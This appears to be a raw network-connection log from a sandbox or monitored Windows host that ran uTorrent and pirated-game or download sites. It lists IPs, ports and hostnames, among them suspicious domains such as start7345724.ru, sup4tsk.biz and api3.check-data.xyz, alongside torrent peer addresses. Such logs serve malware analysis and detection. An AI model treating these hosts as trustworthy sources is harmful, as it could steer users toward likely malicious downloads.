NL 141.226.228.48:443 am-trc-events.taboola.com tcp
NL 141.226.228.48:443 am-trc-events.taboola.com tcp
NL 141.226.228.48:443 am-trc-events.taboola.com tcp
US 172.67.10.107:443 images.atmequiz.com tcp
MX 177.245.153.165:3461 udp
NL 185.89.210.82:443 ib.adnxs.com tcp
IE 20.47.117.32:443 www.temu.com tcp
US 141.226.224.32:443 cds.taboola.com tcp
US 216.239.34.36:443 region1.google-analytics.com udp
IE 18.66.171.73:443 api.privacy-center.org tcp
US 44.196.243.250:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
IS 82.221.103.245:80 update.utorrent.li tcp
US 104.16.213.94:443 media.adaware.com tcp
GB 87.248.204.1:80 video.rainberrytv.com tcp
US 52.204.42.239:80 i-38.b-47142.ut.bench.utorrent.com tcp
IS 82.221.103.246:80 update.utorrent.li tcp
US 3.165.232.11:80 utclient.utorrent.com tcp
GB 87.248.205.1:80 video.rainberrytv.com tcp
US 3.214.87.95:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 52.204.42.239:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 18.213.206.169:443 ledger.bt.co tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.194.83.192:443 airdrop.bt.co tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
N/A 127.0.0.1:10702 tcp
NL 178.250.1.25:443 csm.nl3.eu.criteo.net tcp
US 3.214.87.95:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 52.204.42.239:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-38.b-47142.ut.bench.utorrent.com tcp
GB 95.101.143.219:443 www.bing.com tcp
US 52.204.42.239:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 172.67.218.22:80 skidrowgamereloaded.co tcp
US 172.67.218.22:80 skidrowgamereloaded.co tcp
US 172.67.218.22:443 skidrowgamereloaded.co tcp
GB 172.217.16.228:443 www.google.com tcp
US 172.64.147.188:443 kit.fontawesome.com tcp
GB 142.250.187.238:443 google.com tcp
GB 142.250.187.238:443 google.com udp
RU 88.212.201.204:443 counter.yadro.ru tcp
GB 142.250.200.22:443 i.ytimg.com tcp
US 172.67.139.119:443 ka-f.fontawesome.com tcp
US 172.67.139.119:443 ka-f.fontawesome.com tcp
US 172.67.139.119:443 ka-f.fontawesome.com tcp
US 172.67.139.119:443 ka-f.fontawesome.com tcp
GB 172.217.169.2:443 googleads.g.doubleclick.net tcp
GB 172.217.16.228:443 www.google.com udp
GB 172.217.169.2:443 googleads.g.doubleclick.net udp
GB 172.217.16.228:443 www.google.com udp
GB 172.217.169.74:443 jnn-pa.googleapis.com tcp
GB 142.250.200.38:443 static.doubleclick.net tcp
GB 142.250.200.33:443 yt3.ggpht.com tcp
GB 172.217.169.74:443 jnn-pa.googleapis.com udp
GB 142.250.187.206:443 play.google.com tcp
GB 142.250.187.206:443 play.google.com udp
US 8.8.4.4:443 dns.google udp
US 204.79.197.239:443 tcp
GB 23.73.139.43:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 172.67.159.189:443 gamecloudshare.uno tcp
US 172.67.159.189:443 gamecloudshare.uno tcp
US 104.19.230.21:443 api.hcaptcha.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 104.19.229.21:443 api.hcaptcha.com tcp
GB 142.250.187.206:443 play.google.com udp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
GB 172.217.16.228:443 www.google.com udp
GB 172.217.16.228:443 www.google.com udp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
GB 142.250.187.238:443 google.com udp
US 172.67.222.15:443 playsafedownloads.space tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
GB 172.217.16.228:443 www.google.com udp
GB 172.217.169.34:443 googleads.g.doubleclick.net udp
UA 109.110.71.145:1665 udp
RU 91.203.8.137:6881 udp
RU 109.74.222.35:41937 udp
US 73.249.2.31:6881 udp
US 8.8.4.4:443 dns.google udp
NL 81.17.55.113:443 www9.smartadserver.com tcp
US 131.153.148.2:443 tcp
US 185.167.164.53:443 tcp
GB 87.248.204.1:443 video.rainberrytv.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
US 131.153.148.2:443 tcp
US 185.167.164.53:443 tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
NL 81.17.55.113:443 www9.smartadserver.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:80 i-38.b-47142.ut.bench.utorrent.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
US 44.196.243.250:80 i-38.b-47142.ut.bench.utorrent.com tcp
RU 217.15.128.212:7092 udp
NL 83.87.169.48:31958 udp
UA 91.235.196.195:20563 udp
RU 5.187.87.207:35128 udp
US 107.115.178.97:37602 udp
GB 142.250.187.238:443 google.com udp
KR 121.170.20.76:44147 udp
RU 79.165.35.124:6881 udp
CN 222.247.225.100:9786 udp
BR 177.159.78.125:6881 udp
KR 121.128.144.252:6881 udp
US 23.125.130.131:49178 udp
NL 91.199.227.105:11129 udp
RU 46.50.137.9:51413 udp
DE 93.192.236.148:51413 udp
CN 101.93.81.143:8706 udp
ES 87.218.92.87:6889 udp
AU 157.211.252.95:11439 udp
IS 31.209.235.182:50321 udp
US 8.8.4.4:443 dns.google udp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
GB 87.248.204.1:443 video.rainberrytv.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
US 44.196.243.250:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
FR 5.135.209.97:443 www9.smartadserver.com tcp
FR 5.135.209.97:443 www9.smartadserver.com tcp
CN 111.19.60.107:34753 udp
GB 95.101.143.219:443 www.bing.com tcp
GB 95.101.143.219:443 www.bing.com tcp
BR 191.177.173.147:3151 udp
KR 121.150.12.18:7973 udp
GB 142.250.187.238:443 google.com udp
NL 185.107.44.203:49565 udp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
FR 5.135.209.97:443 www9.smartadserver.com tcp
FR 5.135.209.97:443 www9.smartadserver.com tcp
KR 115.40.161.85:40841 udp
IT 151.84.66.15:6881 udp
BR 179.48.204.224:51400 udp
RU 185.97.201.209:11569 udp
IS 185.191.232.75:44636 udp
NL 178.162.174.11:28007 udp
US 172.67.192.10:80 start7345724.ru tcp
US 172.67.192.10:80 start7345724.ru tcp
CN 221.219.96.184:51414 udp
US 8.8.8.8:53 skidrowgamereloaded.co udp
US 172.67.218.22:443 skidrowgamereloaded.co tcp
BR 200.193.111.23:53288 udp
US 172.67.192.10:80 start7345724.ru tcp
US 172.67.192.10:80 start7345724.ru tcp
ID 36.85.222.58:10837 udp
US 172.67.192.10:80 start7345724.ru tcp
US 8.8.8.8:53 api-torrent.ru udp
NL 104.192.42.148:443 api-torrent.ru tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 172.67.192.10:80 start7345724.ru tcp
US 8.8.8.8:53 58.222.85.36.in-addr.arpa udp
US 8.8.8.8:53 148.42.192.104.in-addr.arpa udp
US 104.21.87.238:443 fold.hibiscusespears.com tcp
US 172.67.192.10:80 start7345724.ru tcp
RU 95.163.241.63:80 95.163.241.63 tcp
SE 185.117.88.231:80 bobisawinner.xyz tcp
US 8.8.8.8:53 63.241.163.95.in-addr.arpa udp
SE 185.117.88.231:80 bobisawinner.xyz tcp
US 172.67.192.10:80 start7345724.ru tcp
US 172.67.192.10:80 start7345724.ru tcp
RU 178.71.116.242:6881 udp
US 172.67.192.10:80 start7345724.ru tcp
US 172.67.192.10:80 start7345724.ru tcp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
NL 185.26.182.123:443 autoupdate.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 82.145.216.47:443 autoupdate.geo.opera.com tcp
NL 82.145.216.16:443 features.opera-api2.com tcp
US 104.18.25.17:443 api.config.opr.gg tcp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 17.25.18.104.in-addr.arpa udp
NL 82.145.216.49:443 download.opera.com tcp
US 172.67.192.10:80 start7345724.ru tcp
US 104.18.10.89:443 download5.operacdn.com tcp
SE 81.226.111.18:6881 udp
US 8.8.4.4:443 dns.google udp
BR 200.193.105.50:50321 udp
GB 87.248.205.1:443 video.rainberrytv.com tcp
GB 87.248.205.1:443 video.rainberrytv.com tcp
GB 87.248.205.1:443 video.rainberrytv.com tcp
US 3.214.87.95:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 8.8.8.8:53 exodus.desync.com udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 3.214.87.95:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 95.101.143.176:443 download3.operacdn.com tcp
NL 104.192.42.148:443 api-torrent.ru tcp
US 172.67.192.10:80 start7345724.ru tcp
US 172.67.192.10:80 start7345724.ru tcp
KR 118.42.45.204:33001 udp
US 3.214.87.95:80 i-72.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-72.b-47142.ut.bench.utorrent.com tcp
US 34.196.244.100:443 i-72.b-47142.ut.bench.utorrent.com tcp
US 34.196.244.100:443 i-72.b-47142.ut.bench.utorrent.com tcp
US 34.196.244.100:443 i-72.b-47142.ut.bench.utorrent.com tcp
US 34.196.244.100:443 i-72.b-47142.ut.bench.utorrent.com tcp
US 34.196.244.100:443 i-72.b-47142.ut.bench.utorrent.com tcp
US 34.196.244.100:443 i-72.b-47142.ut.bench.utorrent.com tcp
US 208.67.222.222:53 83.176.215.181.in-addr.arpa udp
US 199.59.243.227:6969 9.rarbg.me udp
FR 5.196.111.64:443 www9.smartadserver.com tcp
FR 5.196.111.64:443 www9.smartadserver.com tcp
US 8.8.8.8:53 227.243.59.199.in-addr.arpa udp
US 8.8.8.8:53 64.111.196.5.in-addr.arpa udp
US 44.197.0.133:80 i-72.b-47142.ut.bench.utorrent.com tcp
PH 49.149.91.29:1067 udp
GB 86.26.0.9:47263 udp
BR 179.108.91.132:55404 udp
BR 186.205.17.139:5350 udp
N/A 239.192.152.143:6771 udp
MY 14.192.213.215:12147 udp
NL 46.232.211.200:24259 udp
NL 176.56.239.28:6774 udp
PL 89.64.29.38:50042 udp
UA 31.133.61.47:2314 udp
NL 95.211.110.228:28010 udp
AU 101.177.69.77:6881 udp
CL 186.10.170.97:1337 tracker.internetwarriors.net udp
NL 143.179.179.57:49001 udp
HK 125.59.194.159:11237 udp
NL 193.23.249.199:50171 udp
IT 93.47.37.25:6983 udp
SG 43.133.62.119:15000 udp
IT 95.231.184.71:52153 udp
BR 177.4.122.103:37321 udp
HK 119.236.124.76:49001 udp
SI 89.142.16.194:49001 udp
KR 121.173.203.128:40877 udp
CN 125.37.189.34:41700 udp
IL 5.29.9.99:40022 udp
US 75.103.160.164:56294 udp
IN 157.38.116.237:50249 udp
CN 120.232.79.248:2063 udp
BR 45.233.81.244:44698 udp
ES 95.17.53.127:20022 udp
EG 41.47.7.233:52057 udp
US 8.8.8.8:53 139.17.205.186.in-addr.arpa udp
US 8.8.8.8:53 143.152.192.239.in-addr.arpa udp
US 8.8.8.8:53 215.213.192.14.in-addr.arpa udp
US 8.8.8.8:53 200.211.232.46.in-addr.arpa udp
US 8.8.8.8:53 28.239.56.176.in-addr.arpa udp
US 8.8.8.8:53 38.29.64.89.in-addr.arpa udp
US 8.8.8.8:53 47.61.133.31.in-addr.arpa udp
US 8.8.8.8:53 228.110.211.95.in-addr.arpa udp
US 8.8.8.8:53 77.69.177.101.in-addr.arpa udp
US 8.8.8.8:53 97.170.10.186.in-addr.arpa udp
US 8.8.8.8:53 57.179.179.143.in-addr.arpa udp
US 8.8.8.8:53 159.194.59.125.in-addr.arpa udp
US 8.8.8.8:53 199.249.23.193.in-addr.arpa udp
US 8.8.8.8:53 25.37.47.93.in-addr.arpa udp
US 8.8.8.8:53 119.62.133.43.in-addr.arpa udp
US 8.8.8.8:53 71.184.231.95.in-addr.arpa udp
US 8.8.8.8:53 103.122.4.177.in-addr.arpa udp
US 8.8.8.8:53 76.124.236.119.in-addr.arpa udp
US 8.8.8.8:53 194.16.142.89.in-addr.arpa udp
US 8.8.8.8:53 128.203.173.121.in-addr.arpa udp
US 8.8.8.8:53 34.189.37.125.in-addr.arpa udp
US 8.8.8.8:53 99.9.29.5.in-addr.arpa udp
US 8.8.8.8:53 164.160.103.75.in-addr.arpa udp
US 8.8.8.8:53 237.116.38.157.in-addr.arpa udp
US 8.8.8.8:53 248.79.232.120.in-addr.arpa udp
US 8.8.8.8:53 244.81.233.45.in-addr.arpa udp
US 8.8.8.8:53 127.53.17.95.in-addr.arpa udp
US 8.8.8.8:53 233.7.47.41.in-addr.arpa udp
DZ 41.99.87.115:55196 udp
US 104.222.16.99:57190 udp
PL 83.29.62.94:60923 udp
DZ 41.99.87.115:55196 tcp
US 104.222.16.99:57190 tcp
PL 83.29.62.94:60923 tcp
GB 217.44.73.79:43558 udp
GB 217.44.73.79:43558 tcp
GB 181.215.176.83:50993 udp
GB 181.215.176.83:50993 tcp
NL 93.158.213.92:1337 tracker.opentrackr.org udp
US 44.196.33.1:443 ledger.bt.co tcp
US 3.210.17.85:80 i-28.b-47142.ut.bench.utorrent.com tcp
GB 88.221.134.194:443 ced.sascdn.com tcp
US 3.214.87.95:80 i-28.b-47142.ut.bench.utorrent.com tcp
US 146.70.173.160:62801 udp
US 146.70.172.32:62801 udp
CH 188.60.237.252:1024 udp
GB 143.58.200.241:56820 udp
KR 221.144.33.54:42597 udp
BR 191.6.103.225:51060 udp
RU 89.208.97.54:34847 udp
JP 203.165.46.46:6881 udp
IT 93.35.168.249:32775 udp
BR 189.74.219.253:46244 udp
MX 177.245.155.112:33544 udp
FI 65.108.78.54:6881 udp
GY 190.80.34.130:57072 udp
BG 79.100.105.107:51769 udp
RU 46.63.252.24:49001 udp
US 3.214.87.95:80 i-28.b-47142.ut.bench.utorrent.com tcp
US 146.70.173.160:62801 tcp
US 146.70.172.32:62801 tcp
US 103.224.182.246:6969 tracker.coppersurfer.tk udp
VN 183.80.50.58:49836 udp
PH 175.176.50.58:15577 udp
N/A 239.192.152.143:6771 udp
BR 200.225.113.105:35281 udp
US 3.214.87.95:80 i-28.b-47142.ut.bench.utorrent.com tcp
IQ 37.239.7.233:49784 udp
UZ 213.230.116.237:42637 udp
US 8.8.8.8:53 54.33.144.221.in-addr.arpa udp
US 8.8.8.8:53 54.97.208.89.in-addr.arpa udp
US 8.8.8.8:53 46.46.165.203.in-addr.arpa udp
US 8.8.8.8:53 130.34.80.190.in-addr.arpa udp
US 8.8.8.8:53 246.182.224.103.in-addr.arpa udp
US 8.8.8.8:53 58.50.80.183.in-addr.arpa udp
US 8.8.8.8:53 107.105.100.79.in-addr.arpa udp
US 8.8.8.8:53 253.219.74.189.in-addr.arpa udp
US 8.8.8.8:53 249.168.35.93.in-addr.arpa udp
US 8.8.8.8:53 241.200.58.143.in-addr.arpa udp
US 8.8.8.8:53 233.7.239.37.in-addr.arpa udp
US 8.8.8.8:53 237.116.230.213.in-addr.arpa udp
N/A 10.127.0.42:50993 udp
N/A 127.0.0.1:50993 udp
N/A 10.127.0.42:50993 tcp
N/A 127.0.0.1:50993 tcp
FR 45.147.96.190:51413 udp
AU 123.208.50.58:33591 udp
IE 54.194.124.68:6881 udp
MX 189.140.142.38:53972 udp
CN 183.192.15.122:8906 udp
BR 189.29.137.99:40440 udp
KR 125.132.186.103:6881 udp
SG 58.182.157.48:6881 udp
KR 121.151.53.141:7829 udp
AM 5.77.205.165:58984 udp
RU 5.44.10.224:2079 udp
CA 99.252.147.131:57823 udp
US 8.8.8.8:53 131.147.252.99.in-addr.arpa udp
BR 177.137.146.50:15039 udp
SG 101.32.169.145:6881 udp
HK 119.28.68.97:6881 udp
RU 91.132.107.136:1426 udp
NZ 121.75.17.177:8621 udp
RU 95.24.4.152:6859 udp
US 8.8.8.8:53 152.4.24.95.in-addr.arpa udp
US 8.8.8.8:53 50.146.137.177.in-addr.arpa udp
CN 223.74.72.241:58109 udp
RU 109.252.14.38:1838 udp
RU 81.24.85.119:1215 udp
TH 223.207.218.121:49001 udp
US 3.214.87.95:80 i-28.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-28.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-28.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-28.b-47142.ut.bench.utorrent.com tcp
KR 125.143.41.188:1070 udp
IT 82.49.87.112:6881 udp
US 199.59.243.227:2730 9.rarbg.me udp
CN 119.177.55.156:25702 udp
NL 87.233.192.212:6969 eddie4.nl udp
TT 143.137.195.221:38339 udp
RU 77.91.229.218:6969 tracker.mg64.net udp
US 8.8.8.8:53 218.229.91.77.in-addr.arpa udp
US 8.8.8.8:53 open.demonii.si udp
CZ 46.8.8.100:1337 open.demonii.si udp
RU 83.146.81.79:6969 tracker.tiny-vps.com udp
US 8.8.8.8:53 ipv6.tracker.harry.lu udp
US 38.89.70.177:61792 udp
US 199.59.243.227:2740 tracker.justseed.it udp
US 199.59.243.227:2770 tracker.justseed.it udp
NL 104.192.42.148:443 api-torrent.ru tcp
NL 194.146.127.97:443 s2.api-torrent.ru tcp
US 8.8.8.8:53 97.127.146.194.in-addr.arpa udp
US 8.8.8.8:53 denis.stalker.upeer.me udp
GB 88.221.135.9:80 e6.i.lencr.org tcp
N/A 127.0.0.1:6969 udp
US 104.21.54.3:6969 tracker.moeking.me udp
US 208.83.20.20:6969 exodus.desync.com udp
BR 45.239.222.18:51536 udp
SE 185.117.88.39:80 sup4tsk.biz tcp
US 199.59.243.227:1337 tracker.justseed.it udp
FR 89.234.156.205:451 tracker.torrent.eu.org udp
US 8.8.8.8:53 rouonixon.com udp
US 8.8.8.8:53 rouonixon.com udp
NL 139.45.197.238:443 rouonixon.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 8.8.8.8:53 my.rtmark.net udp
US 172.67.169.157:443 my.rtmark.net udp
US 172.67.169.157:443 my.rtmark.net tcp
US 8.8.8.8:53 s.click.aliexpress.com udp
US 8.8.8.8:53 s.click.aliexpress.com udp
GB 23.214.144.96:443 s.click.aliexpress.com tcp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 s.go-mpulse.net udp
US 8.8.8.8:53 s.go-mpulse.net udp
GB 95.100.244.132:443 s.go-mpulse.net tcp
N/A 127.0.0.1:80 udp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
US 208.100.26.242:6969 tracker.open-internet.nl udp
US 8.8.8.8:53 bottom.campaign.aliexpress.com udp
US 8.8.8.8:53 bottom.campaign.aliexpress.com udp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 ae.mmstat.com udp
US 8.8.8.8:53 ae.mmstat.com udp
GB 2.18.108.132:443 c.go-mpulse.net tcp
SG 47.246.110.44:443 ae.mmstat.com tcp
GB 163.181.154.244:443 bottom.campaign.aliexpress.com tcp
US 8.8.8.8:53 133.194.101.151.in-addr.arpa udp
US 172.234.222.143:6969 torrentclub.tech udp
US 8.8.8.8:53 ae01.alicdn.com udp
US 8.8.8.8:53 ae01.alicdn.com udp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
NO 185.243.218.213:80 open.stealth.si udp
GB 95.100.244.36:443 ae01.alicdn.com udp
US 8.8.8.8:53 acs.aliexpress.com udp
US 8.8.8.8:53 acs.aliexpress.com udp
US 8.8.8.8:53 aeis.alicdn.com udp
US 8.8.8.8:53 aeis.alicdn.com udp
DE 47.246.146.13:443 acs.aliexpress.com tcp
MX 189.219.231.179:3291 udp
US 8.8.8.8:53 us.ynuf.aliapp.org udp
US 172.234.222.138:80 torrentclub.tech tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 172.234.222.143:80 torrentclub.tech tcp
US 8.8.4.4:443 dns.google udp
SG 13.229.114.252:443 wstracker.online tcp
DE 47.246.146.192:443 tcp
CN 124.239.14.253:443 tcp
CN 124.239.14.253:443 tcp
DE 47.246.146.191:443 tcp
IN 117.193.236.132:48490 udp
US 54.210.117.250:443 service-domain.xyz tcp
AU 203.220.191.213:61986 udp
GB 88.221.134.137:80 r10.o.lencr.org tcp
GB 216.58.201.99:80 o.pki.goog tcp
GB 216.58.201.99:80 o.pki.goog tcp
GB 216.58.201.99:80 o.pki.goog tcp
GB 142.250.178.14:443 clients2.google.com tcp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
GB 142.250.178.14:443 clients2.google.com tcp
GB 95.100.244.132:443 s.go-mpulse.net udp
US 172.67.192.10:80 start7345724.ru tcp
US 35.162.118.53:80 api3.check-data.xyz tcp
US 172.67.159.189:443 gamecloudshare.uno tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 35.162.118.53:443 api3.check-data.xyz tcp
HU 5.187.235.0:50921 udp
KZ 185.22.66.16:80 www.rapidfilestorage.com tcp
KZ 185.22.66.16:80 www.rapidfilestorage.com tcp
RU 80.78.240.92:80 rfiles5.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
GB 216.58.212.227:443 update.googleapis.com tcp
US 172.67.218.22:443 skidrowgamereloaded.co tcp
US 172.67.139.119:443 ka-f.fontawesome.com tcp
GB 142.250.180.14:443 www.youtube.com udp
GB 142.250.180.14:443 www.youtube.com tcp
CN 124.239.14.252:443 tcp
US 172.64.147.188:443 kit.fontawesome.com tcp
GB 172.217.16.228:443 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
CN 124.239.14.252:443 tcp
RU 88.212.201.198:443 counter.yadro.ru tcp
GB 142.250.178.22:443 i.ytimg.com udp
DZ 41.99.87.115:55196 tcp
GB 142.250.187.206:443 www.youtube.com udp
GB 142.250.187.206:443 www.youtube.com tcp
US 44.226.34.177:443 api3.check-data.xyz tcp
US 44.226.34.177:443 api3.check-data.xyz tcp
SA 31.166.86.133:28389 udp
NL 104.192.42.148:443 api-torrent.ru tcp
US 172.234.222.138:80 torrentclub.tech tcp
US 172.234.222.143:80 torrentclub.tech tcp
CA 174.93.18.28:47445 udp
US 8.8.4.4:443 dns.google udp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 34.192.104.143:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 34.192.104.143:80 i-38.b-47142.ut.bench.utorrent.com tcp
FR 5.196.111.64:443 www9.smartadserver.com tcp
FR 5.196.111.64:443 www9.smartadserver.com tcp
US 146.70.172.32:62801 tcp
RU 95.78.208.118:52201 udp
GB 181.215.176.83:50993 tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
US 146.70.173.160:62801 tcp
SE 185.117.88.39:80 sup4tsk.biz tcp
KZ 188.0.147.111:20504 udp
US 8.8.8.8:53 rouonixon.com udp
US 8.8.8.8:53 rouonixon.com udp
NL 139.45.197.238:443 rouonixon.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 8.8.8.8:53 my.rtmark.net udp
US 104.21.27.183:443 my.rtmark.net udp
US 104.21.27.183:443 my.rtmark.net tcp
US 8.8.8.8:53 s.click.aliexpress.com udp
US 8.8.8.8:53 s.click.aliexpress.com udp
GB 23.214.144.96:443 s.click.aliexpress.com tcp
US 8.8.8.8:53 www.aliexpress.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 assets.alicdn.com udp
US 8.8.8.8:53 s.go-mpulse.net udp
US 8.8.8.8:53 s.go-mpulse.net udp
GB 95.100.244.132:443 s.go-mpulse.net tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
GB 23.214.144.96:443 assets.alicdn.com tcp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 c.go-mpulse.net udp
GB 2.18.108.132:443 c.go-mpulse.net tcp
US 8.8.8.8:53 bottom.campaign.aliexpress.com udp
US 8.8.8.8:53 ae.mmstat.com udp
US 8.8.8.8:53 ae.mmstat.com udp
SG 47.246.110.45:443 ae.mmstat.com tcp
GB 163.181.154.244:443 bottom.campaign.aliexpress.com tcp
US 8.8.8.8:53 ae01.alicdn.com udp
US 8.8.8.8:53 ae01.alicdn.com udp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com tcp
GB 95.100.244.36:443 ae01.alicdn.com udp
US 8.8.8.8:53 acs.aliexpress.com udp
US 8.8.8.8:53 acs.aliexpress.com udp
DE 47.246.146.13:443 acs.aliexpress.com tcp
US 8.8.8.8:53 aeis.alicdn.com udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
